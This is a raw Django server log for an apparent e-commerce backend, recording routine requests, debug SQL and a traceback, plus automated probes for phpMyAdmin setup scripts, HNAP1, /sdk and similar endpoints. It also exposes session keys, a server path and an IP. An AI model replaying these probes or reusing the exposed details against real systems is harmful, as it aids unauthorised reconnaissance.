"GET / HTTP/1.0" 302 0 [12/Dec/2019 18:38:58] "GET / HTTP/1.0" 302 0 [12/Dec/2019 18:44:01] "GET / HTTP/1.0" 302 0 [12/Dec/2019 18:50:46] "GET / HTTP/1.0" 302 0 [12/Dec/2019 18:55:49] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:04:44] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:20:11] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [12/Dec/2019 19:24:27] "GET /proxy.php HTTP/1.0" 404 6629 [12/Dec/2019 19:25:14] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:30:17] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 19:35:20] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:40:23] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:45:26] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:50:29] "GET / HTTP/1.0" 302 0 [12/Dec/2019 19:57:38] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:01:21] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:03:19] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:09:15] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:14:34] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:19:58] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:25:01] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:30:28] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:35:31] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:40:34] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:45:36] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:50:39] "GET / HTTP/1.0" 302 0 [12/Dec/2019 20:55:42] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [12/Dec/2019 21:00:28] "GET /robots.txt HTTP/1.0" 404 6624 [12/Dec/2019 21:00:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 21:00:29,236 utils 11259 139831317362432 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '1qpngvry6hj91p1yw1rxkax50tz4o7iz' LIMIT 1; args=('1qpngvry6hj91p1yw1rxkax50tz4o7iz',) DEBUG 2019-12-12 21:00:29,238 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('1qpngvry6hj91p1yw1rxkax50tz4o7iz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T21:00:29.236941+00:00'::timestamptz); args=('1qpngvry6hj91p1yw1rxkax50tz4o7iz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 21, 0, 29, 236941, tzinfo=)) [12/Dec/2019 21:00:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 21:05:02] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:20:11] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:22:35] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:23:40] "GET /nmaplowercheck1576185820 HTTP/1.0" 301 0 [12/Dec/2019 21:23:41] "GET /HNAP1 HTTP/1.0" 301 0 Internal Server Error: /sdk Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/sdk/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [12/Dec/2019 21:23:41] "POST /sdk HTTP/1.0" 500 62927 DEBUG 2019-12-12 21:23:41,563 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'HNAP1'; args=('HNAP1',) Not Found: /HNAP1/ [12/Dec/2019 21:23:41] "GET /HNAP1/ HTTP/1.0" 404 1726 [12/Dec/2019 21:23:42] "HEAD / HTTP/1.0" 302 0 [12/Dec/2019 21:23:42] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:23:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 21:23:42,503 utils 11259 139831538779904 (0.006) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'pi1oet62z2ldhybqq474sbc3q7qodfir' LIMIT 1; args=('pi1oet62z2ldhybqq474sbc3q7qodfir',) DEBUG 2019-12-12 21:23:42,506 utils 11259 139831538779904 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('pi1oet62z2ldhybqq474sbc3q7qodfir', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T21:23:42.504171+00:00'::timestamptz); args=('pi1oet62z2ldhybqq474sbc3q7qodfir', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 21, 23, 42, 504171, tzinfo=)) [12/Dec/2019 21:23:42] "HEAD /login/?next=/ HTTP/1.0" 200 1786 Not Found: /evox/about [12/Dec/2019 21:23:42] "GET /evox/about HTTP/1.0" 404 6623 [12/Dec/2019 21:25:13] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:30:16] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:35:19] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:40:18] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:40:22] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:46:26] "GET / HTTP/1.0" 302 0 [12/Dec/2019 21:52:39] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 21:52:40,088 utils 11259 139831538779904 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'a6qc0rpl8tmaql745o1h5768ttothbgj' LIMIT 1; args=('a6qc0rpl8tmaql745o1h5768ttothbgj',) DEBUG 2019-12-12 21:52:40,091 utils 11259 139831538779904 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('a6qc0rpl8tmaql745o1h5768ttothbgj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T21:52:40.089443+00:00'::timestamptz); args=('a6qc0rpl8tmaql745o1h5768ttothbgj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 21, 52, 40, 89443, tzinfo=)) [12/Dec/2019 21:52:40] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 21:53:34] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:00:01] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:10:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:15:52] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:20:55] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:25:58] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:31:00] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:36:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:41:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:46:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:51:11] "GET / HTTP/1.0" 302 0 [12/Dec/2019 22:56:14] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:02:56] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:04:10] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:10:04] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:15:07] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:21:36] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:26:39] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:28:48] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 23:28:48,411 utils 11259 139831538779904 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'c6kk785svelpglkfhz4zjb41pnwbqh6o' LIMIT 1; args=('c6kk785svelpglkfhz4zjb41pnwbqh6o',) DEBUG 2019-12-12 23:28:48,413 utils 11259 139831538779904 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('c6kk785svelpglkfhz4zjb41pnwbqh6o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T23:28:48.412078+00:00'::timestamptz); args=('c6kk785svelpglkfhz4zjb41pnwbqh6o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 23, 28, 48, 412078, tzinfo=)) [12/Dec/2019 23:28:48] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 23:28:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 23:28:50,800 utils 11259 139831538779904 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'er41bmwjqffiq34ckuebdh6aeo2rh28o' LIMIT 1; args=('er41bmwjqffiq34ckuebdh6aeo2rh28o',) DEBUG 2019-12-12 23:28:50,802 utils 11259 139831538779904 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('er41bmwjqffiq34ckuebdh6aeo2rh28o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T23:28:50.800952+00:00'::timestamptz); args=('er41bmwjqffiq34ckuebdh6aeo2rh28o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 23, 28, 50, 800952, tzinfo=)) [12/Dec/2019 23:28:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [12/Dec/2019 23:28:50] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [12/Dec/2019 23:28:50] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [12/Dec/2019 23:28:50] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [12/Dec/2019 23:28:50] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [12/Dec/2019 23:28:51] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [12/Dec/2019 23:28:51] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [12/Dec/2019 23:31:42] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:39:42] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:44:45] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:49:47] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:54:50] "GET / HTTP/1.0" 302 0 [12/Dec/2019 23:59:52] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:18:47] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:20:11] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:28:10] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:33:13] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:40:23] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:45:26] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [13/Dec/2019 00:50:29] "GET / HTTP/1.0" 302 0 [13/Dec/2019 00:56:58] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:05:02] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:15:08] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:24:00] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:29:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [13/Dec/2019 01:33:13] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:34:06] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:39:09] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:44:11] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:49:14] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:51:52] "GET / HTTP/1.0" 302 0 [13/Dec/2019 01:55:18] "GET / HTTP/1.0" 302 0 [13/Dec/2019 02:05:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 02:11:06] "GET / HTTP/1.0" 302 0 [13/Dec/2019 02:16:15] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 02:16:16,020 utils 11259 139831538779904 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nzroegp155dpjinnaiglm051a1cpe6ij' LIMIT 1; args=('nzroegp155dpjinnaiglm051a1cpe6ij',) DEBUG 2019-12-13 02:16:16,023 utils 11259 139831538779904 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nzroegp155dpjinnaiglm051a1cpe6ij', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-27T02:16:16.021228+00:00'::timestamptz); args=('nzroegp155dpjinnaiglm051a1cpe6ij', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 27, 2, 16, 16, 21228, tzinfo=)) [13/Dec/2019 02:16:16] "GET /login/?next=/ HTTP/1.0" 200 1786 [13/Dec/2019 02:20:50] "GET / HTTP/1.0" 302 0 [13/Dec/2019 02:28:22] "GET / HTTP/1.0" 302 0 Not Found: /echo.php [13/Dec/2019 02:28:48] "GET /echo.php HTTP/1.0" 404 6618 [13/Dec/2019 02:37:34] "GET / HTTP/1.0" 302 0 [13/Dec/2019 02:42:41] "GET / HTTP/1.0" 302 0 [13/Dec/2019 02:47:44] "GET / HTTP/1.0" 302 0 [13/Dec/2019 02:52:47] "GET / HTTP/1.0" 302 0 [13/Dec/2019 02:57:49] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:00:13] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:07:34] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:07:34] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:12:37] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:14:29] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:19:11] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:24:14] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:30:40] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:35:43] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:40:45] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:45:48] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:53:58] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:56:14] "GET / HTTP/1.0" 302 0 [13/Dec/2019 03:59:00] "GET / HTTP/1.0" 302 0 [13/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [13/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [13/Dec/2019 04:22:47] "GET / HTTP/1.0" 302 0 [13/Dec/2019 04:27:50] "GET / HTTP/1.0" 302 0 [13/Dec/2019 04:35:42] "GET / HTTP/1.0" 302 0 [13/Dec/2019 04:44:57] "GET / HTTP/1.0" 302 0 [13/Dec/2019 04:49:59] "GET / HTTP/1.0" 302 0 [13/Dec/2019 04:55:02] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:12:45] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:17:48] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [13/Dec/2019 05:18:02] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [13/Dec/2019 05:18:06] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=110 HTTP/1.0" 404 6705 Not Found: /newslist.asp [13/Dec/2019 05:18:10] "GET /newslist.asp?type=4&id=13 HTTP/1.0" 404 6647 [13/Dec/2019 05:22:51] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:27:54] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:33:22] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:38:25] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:42:45] "GET /muieblackcat HTTP/1.0" 301 0 Not Found: //phpMyAdmin/scripts/setup.php [13/Dec/2019 05:42:46] "GET //phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6680 Not Found: //phpmyadmin/scripts/setup.php [13/Dec/2019 05:42:46] "GET //phpmyadmin/scripts/setup.php HTTP/1.0" 404 6680 Not Found: //pma/scripts/setup.php [13/Dec/2019 05:42:47] "GET //pma/scripts/setup.php HTTP/1.0" 404 6659 Not Found: //myadmin/scripts/setup.php [13/Dec/2019 05:42:47] "GET //myadmin/scripts/setup.php HTTP/1.0" 404 6671 Not Found: //MyAdmin/scripts/setup.php [13/Dec/2019 05:42:48] "GET //MyAdmin/scripts/setup.php HTTP/1.0" 404 6671 [13/Dec/2019 05:43:27] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:48:30] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:53:33] "GET / HTTP/1.0" 302 0 [13/Dec/2019 05:59:10] "GET / HTTP/1.0" 302 0 [13/Dec/2019 06:04:14] "GET / HTTP/1.0" 302 0 [13/Dec/2019 06:09:35] "GET / HTTP/1.0" 302 0 [13/Dec/2019 06:10:59] "GET / HTTP/1.0" 302 0 [13/Dec/2019 06:19:09] "GET / HTTP/1.0" 302 0 [13/Dec/2019 06:24:12] "GET / HTTP/1.0" 302 0 [13/Dec/2019 06:30:20] "GET / HTTP/1.0" 302 0 [13/Dec/2019 06:36:49] "GET / HTTP/1.0" 302 0 [13/Dec/2019 06:41:52] "GET / HTTP/1.0" 302 0 [13/Dec/2019 06:46:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 06:50:20,755 utils 11259 139831538779904 (0.017) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 06:50:20,762 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 06:50:20,765 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 06:50:20,767 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 06:50:20,772 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 06:50:20,775 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 06:50:20,777 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 06:50:20,779 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 06:50:20,782 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 06:50:20,784 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 06:50:20,786 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 06:50:20] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 06:51:30] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 06:51:32,739 utils 11259 139831538779904 (0.010) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5e7ekb30sgdu0aoru9ply2c8v8ex1e7l' LIMIT 1; args=('5e7ekb30sgdu0aoru9ply2c8v8ex1e7l',) DEBUG 2019-12-13 06:51:32,744 utils 11259 139831538779904 (0.003) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5e7ekb30sgdu0aoru9ply2c8v8ex1e7l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-27T06:51:32.740020+00:00'::timestamptz); args=('5e7ekb30sgdu0aoru9ply2c8v8ex1e7l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 27, 6, 51, 32, 740020, tzinfo=)) [13/Dec/2019 06:51:32] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /index.asp [13/Dec/2019 06:51:35] "GET /index.asp HTTP/1.0" 404 6621 [13/Dec/2019 06:51:57] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 06:52:15,553 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 06:52:15,558 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 06:52:15,560 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 06:52:15,562 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 06:52:15,565 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 06:52:15,567 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 06:52:15,570 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 06:52:15,572 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 